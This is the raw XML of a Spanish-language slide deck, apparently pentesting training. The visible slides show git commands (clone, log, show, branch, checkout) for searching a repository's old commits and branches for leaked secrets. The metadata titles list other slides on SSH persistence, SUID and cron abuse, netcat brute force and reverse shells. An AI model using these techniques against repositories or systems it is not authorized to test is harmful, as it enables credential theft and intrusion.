            <a:ext cx="9671050" cy="559342"/>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2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Github 1 Repositorio</a:t>
            </a:r>
            <a:endParaRPr sz="28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46872" y="852763"/>
            <a:ext cx="10160000" cy="5891824"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Una de las cosas básicas que hay que saber es manejarse con repositorios github, en este caso lo vamos a ver pero orientándonos a encontrar información delicada, es necesario tener cierto conocimiento en github antes de abordar esta parte.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Para clonar el repositorio: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>git clone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>https://myrepositorio.github.com</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lo que hay que atender del repositorio son: ( Commits, branches y tags ).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Lo primero sería observar el repositorio y sus ficheros en busca de información, su fichero README.md, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" smtClean="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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>¿Cuál es nuestro objetivo?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Obviamente no encontraremos variables de entorno de bases de datos allí o cosas por el estilo pero si puede ser que por error estén dentro de un commit antiguo que fue corregido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345223" y="6011129"/>
            <a:ext cx="946736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65237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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Github 2 Atender commits</a:t>
            </a:r>
            <a:endParaRPr sz="28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963638" y="1109220"/>
            <a:ext cx="9529279" cy="5271200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Para ver los commits del repositorio podemos hacer uso del comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> git log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Este comando nos listará los distintos commits, con un número de commit de identificación</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" smtClean="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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>para ver los cambios en el commit utilizamos el comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>git show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>“numerodecommit”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Allí nos mostrara lo que se agregó y lo que se quito de un commit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar cha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
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345223" y="6011129"/>
            <a:ext cx="946736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880384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444870" y="204057"/>
            <a:ext cx="9671050" cy="559342"/>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2800" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FEFEFE"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:ea typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
                <a:sym typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>Github 3 Atender branches</a:t>
            </a:r>
            <a:endParaRPr sz="28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854581" y="1931341"/>
            <a:ext cx="9529279" cy="4284901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="412750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Para ver las ramas podemos hacer uso del comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> git branch -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Este comando nos listará las ramas y para acceder a una rama utilizamos:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>git </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>checkout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>“nombrerama”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Una vez dentro de la rama podemos listar los commits de esa rama, como hicimos anteriormente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="127000" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="29FB33"/>
              </a:buClr>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800" smtClean="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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>	</a:t>
            </a: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
        <p:nvSpPr>
          <p:cNvPr id="106" name="Google Shape;106;p1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345223" y="6011129"/>
            <a:ext cx="946736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5499209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1778</TotalTime>
  <Words>682</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Panorámica</PresentationFormat>
  <Paragraphs>184</Paragraphs>
  <Slides>15</Slides>
  <Notes>15</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15</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="22" baseType="lpstr">
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Bahnschrift</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>Century Schoolbook</vt:lpstr>
      <vt:lpstr>View</vt:lpstr>
      <vt:lpstr>View</vt:lpstr>
      <vt:lpstr>Utilización del directorio temporal y variables de entorno.</vt:lpstr>
      <vt:lpstr>Comprometer conexiones SSH 1° (Saltar expulsión configurada en el archivo Shell del usuario)</vt:lpstr>
      <vt:lpstr>Comprometer conexiones SSH 2° (Persistencia)</vt:lpstr>
      <vt:lpstr>Comprometer ficheros SUID y SGUID</vt:lpstr>
      <vt:lpstr>Comprometer tareas cron 1</vt:lpstr>
      <vt:lpstr>Contexto del comando More</vt:lpstr>
      <vt:lpstr>Github 1 Repositorio</vt:lpstr>
      <vt:lpstr>Github 2 Atender commits</vt:lpstr>
      <vt:lpstr>Github 3 Atender branches</vt:lpstr>
      <vt:lpstr>Github 3 Atender tags</vt:lpstr>
      <vt:lpstr>Fuerza bruta orientada a conexiones (netcat)</vt:lpstr>
      <vt:lpstr>Crear una reverse Shell con bash</vt:lpstr>
      <vt:lpstr>Reverse Shell con bash 2 explicación del comando</vt:lpstr>
      <vt:lpstr>Crear una reverse Shell solo con netcat</vt:lpstr>
      <vt:lpstr>Crear una reverse Shell con zsh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Inicio (Tener en cuenta)</dc:title>
  <dc:creator>Seba</dc:creator>
  <cp:lastModifiedBy>Usuario</cp:lastModifiedBy>
  <cp:revision>141</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-11T19:11:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-27T19:42:41Z</dcterms:modified>
</cp:coreProperties>
</file>